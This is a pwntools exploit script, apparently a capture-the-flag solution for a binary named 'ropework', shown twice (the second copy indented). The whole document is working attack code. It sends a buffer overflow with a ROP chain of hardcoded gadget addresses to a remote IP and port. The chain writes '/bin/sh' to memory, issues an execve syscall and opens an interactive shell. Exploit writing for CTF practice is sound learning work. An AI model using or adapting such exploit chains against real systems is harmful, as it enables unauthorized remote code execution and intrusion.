xct/solve.py Secret

## solve.py
from pwn import *
import binascii
context.terminal = ['alacritty', '-e', 'zsh', '-c']
context.arch = "amd64"

# gdb hack
def _new_binary():
	return "gdb-gef"
gdb.binary = _new_binary

p = remote('65.2.136.80',32421, level='debug')
#p = process("./ropework", level="debug")
binary = ELF("ropework")
p.recvuntil("great!")

#gdb.attach(p, '''
#b* 0x401207
#b* system
#continue
#''')

rop = ROP(binary)
rop.raw(rop.find_gadget(['ret'])) # align
rop.raw(0x40126c) #pop r12; pop r13; pop r14; pop r15; ret;
rop.raw(binary.bss(0)+0x80)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0x401196) #  xor r10, r10; ret;
rop.raw(0x401192) #  xor rdx, rdx; ret;
rop.raw(0x40119a) #  xor r10, r12; ret;
rop.raw(0x40117e) #  mov rbx, r10; ret;
rop.raw(0x40118e) #  xor rdx, rbx; ret;
# State: RDX = BSS
rop.raw(0x40126c) # pop r12; pop r13; pop r14; pop r15; ret;
rop.raw(u64("/bin/sh\0"))
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0x401196) #  xor r10, r10; ret;
rop.raw(0x40119a) #  xor r10, r12; ret;
rop.raw(0x40119e) #  mov qword ptr [rdx], r10; ret;
# State: R10 = /bin/sh\0, written to BSS
rop.raw(rop.find_gadget(['pop rdi','ret']))
rop.raw(binary.bss(0)+0x80)
# RDI -> Ptr to BSS /bin/sh

rop.raw(0x40126c) #pop r12; pop r13; pop r14; pop r15; ret;
rop.raw(0x3b) # execve
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0x401196) #  xor r10, r10; ret;
rop.raw(0x401192) #  xor rdx, rdx; ret;
rop.raw(0x40119a) #  xor r10, r12; ret;
rop.raw(0x40117e) #  mov rbx, r10; ret;
rop.raw(0x401182) #  xor rax, rax; ret;
rop.raw(0x401186) #  xor rax, rbx; ret;
rop.raw(0x401192) #  xor rdx, rdx
rop.raw(0x401271) #  pop rsi; pop r15; ret;)
rop.raw(0)
rop.raw(0xdeadbeef)
rop.raw(0x4011a2) # syscall

print(rop.dump())

buf = b""
buf += b"A"*24
buf += rop.chain()
buf += b"Z"*(400-len(buf))
p.sendline(buf)

p.interactive()
p.close()
	from pwn import *
	import binascii
	context.terminal = ['alacritty', '-e', 'zsh', '-c']
	context.arch = "amd64"

	# gdb hack
	def _new_binary():
	return "gdb-gef"
	gdb.binary = _new_binary

	p = remote('65.2.136.80',32421, level='debug')
	#p = process("./ropework", level="debug")
	binary = ELF("ropework")
	p.recvuntil("great!")

	#gdb.attach(p, '''
	#b* 0x401207
	#b* system
	#continue
	#''')

	rop = ROP(binary)
	rop.raw(rop.find_gadget(['ret'])) # align
	rop.raw(0x40126c) #pop r12; pop r13; pop r14; pop r15; ret;
	rop.raw(binary.bss(0)+0x80)
	rop.raw(0xdeadbeef)
	rop.raw(0xdeadbeef)
	rop.raw(0xdeadbeef)
	rop.raw(0x401196) # xor r10, r10; ret;
	rop.raw(0x401192) # xor rdx, rdx; ret;
	rop.raw(0x40119a) # xor r10, r12; ret;
	rop.raw(0x40117e) # mov rbx, r10; ret;
	rop.raw(0x40118e) # xor rdx, rbx; ret;
	# State: RDX = BSS
	rop.raw(0x40126c) # pop r12; pop r13; pop r14; pop r15; ret;
	rop.raw(u64("/bin/sh\0"))
	rop.raw(0xdeadbeef)
	rop.raw(0xdeadbeef)
	rop.raw(0xdeadbeef)
	rop.raw(0x401196) # xor r10, r10; ret;
	rop.raw(0x40119a) # xor r10, r12; ret;
	rop.raw(0x40119e) # mov qword ptr [rdx], r10; ret;
	# State: R10 = /bin/sh\0, written to BSS
	rop.raw(rop.find_gadget(['pop rdi','ret']))
	rop.raw(binary.bss(0)+0x80)
	# RDI -> Ptr to BSS /bin/sh

	rop.raw(0x40126c) #pop r12; pop r13; pop r14; pop r15; ret;
	rop.raw(0x3b) # execve
	rop.raw(0xdeadbeef)
	rop.raw(0xdeadbeef)
	rop.raw(0xdeadbeef)
	rop.raw(0x401196) # xor r10, r10; ret;
	rop.raw(0x401192) # xor rdx, rdx; ret;
	rop.raw(0x40119a) # xor r10, r12; ret;
	rop.raw(0x40117e) # mov rbx, r10; ret;
	rop.raw(0x401182) # xor rax, rax; ret;
	rop.raw(0x401186) # xor rax, rbx; ret;
	rop.raw(0x401192) # xor rdx, rdx
	rop.raw(0x401271) # pop rsi; pop r15; ret;)
	rop.raw(0)
	rop.raw(0xdeadbeef)
	rop.raw(0x4011a2) # syscall

	print(rop.dump())

	buf = b""
	buf += b"A"*24
	buf += rop.chain()
	buf += b"Z"*(400-len(buf))
	p.sendline(buf)

	p.interactive()
	p.close()